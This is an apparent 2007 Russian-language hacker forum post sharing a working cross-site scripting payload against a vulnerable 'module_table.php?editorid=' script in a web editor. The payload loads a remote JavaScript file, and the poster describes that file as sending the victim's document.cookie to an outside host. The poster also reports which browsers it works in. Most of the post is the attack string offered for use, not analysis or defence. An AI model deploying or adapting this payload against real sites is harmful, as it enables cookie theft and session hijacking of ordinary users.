15.08.2007, 13:03
|
|
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258
Репутация:
1
|
|
/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
----------------------------------------------------
module_table.php?editorid= - уязвимый скрипт.
//--></
script><SCRIPT SRC=></SCRIPT>//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
вызывает скрипт сс.js каторый вызывает
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
и все ето хрень корректно работает под ие,но не пашет под оперой.
хотя алерт оперра выводит.
|
|
|